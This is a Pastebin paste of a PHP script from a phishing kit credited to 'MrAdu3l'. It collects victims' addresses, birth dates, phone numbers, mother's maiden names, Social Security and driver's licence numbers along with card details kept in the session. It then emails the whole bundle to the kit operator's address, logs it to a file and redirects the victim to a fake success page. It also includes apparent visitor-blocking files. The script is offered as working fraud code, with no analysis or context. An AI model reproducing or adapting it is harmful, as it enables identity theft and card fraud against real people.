Advertisement
Guest User

Untitled

a guest
Feb 22nd, 2018
267
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.81 KB | None | 0 0
  1. <?php
  2. /* RECODED BY MrAdu3l
  3.  
  4. -- ### MrAdu3l ### */
  5. session_start()
  6. include('../../detect.php');
  7. include('../../blocker.php');
  8.  
  9. /* MrAdu3l */
  10.  
  11. $address_1 = $_POST['address_line1'];
  12. $address_2 = $_POST['address_line2'];
  13. $city = $_POST['city'];
  14. $state = $_POST['state'];
  15. $zip_code = $_POST['zip_code'];
  16. $bday = $_POST['bday'];
  17. $phone = $_POST['phone'];
  18. $mmn = $_POST['mmn'];
  19. $ssn1 = $_POST['ssn1'];
  20. $ssn2 = $_POST['ssn2'];
  21. $ssn3 = $_POST['ssn3'];
  22. $ssn4 = $_POST['driver_license'];
  23.  
  24.  
  25. $msg2 = '
  26. ________ MrAdu3l ________
  27.  
  28. Address Line 1 : '.$address_1.'
  29. Address Line 2 : '.$address_2.'
  30. City : '.$city.'
  31. State : '.$state.'
  32. Zip Code : '.$zip_code.'
  33. Country : '.$nama_negara.'
  34. Birth Day : '.$bday.'
  35. Phone Number : '.$phone.'
  36.  
  37. _______ CARD INFO
  38. '.$_SESSION['pesan_cc'].'
  39.  
  40. _______ MORE CARD INFO
  41.  
  42. MM Name : '.$mmn.'
  43. SSN : '.$ssn1.' - '.$ssn2.' - '.$ssn3.'
  44. DriveL./NatNum : '.$ssn4.'
  45.  
  46. ______ FROM
  47.  
  48. From : '.$ip.'
  49. Date : '.$date.'
  50. Browser : '.$_SERVER['HTTP_USER_AGENT'].'
  51.  
  52. Since : 2017
  53. ________ MrAdu3l ________
  54. ';
  55.  
  56. function validitasi(){
  57.  
  58. if( $_POST['address_line1'] == '' || $_POST['city'] == '' || $_POST['state'] == '' || $_POST['zip_code'] == '' || $_POST['phone'] == '' ){
  59. return false;
  60. }else{
  61. return true;
  62. }
  63. }
  64.  
  65. $validdd = validitasi();
  66.  
  67. if($validdd){
  68. $headers = "Content-type:text/html;charset=UTF-8" . "\r\n";
  69. $headers = "From: CC_ADDRESS <MrAdu3l@CC-ADDRESS.com>" . "\r\n";
  70. include("../../your_mail.php");
  71. $subject = 'CC ADDRESS ['.$_SESSION['subjek'].'] From : '.$ip.' - '.$nama_negara.'';
  72. mail($to, $subject, $msg2, $headers);
  73. fwrite($file, ''.$msg2.'
  74. ');
  75. fclose($file);
  76. header("Location: success");
  77. }else{
  78. fwrite($file, ''.$msg2.'
  79. ');
  80. fclose($file);
  81. header("Location: address?error=yes");
  82. }
  83.  
  84. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement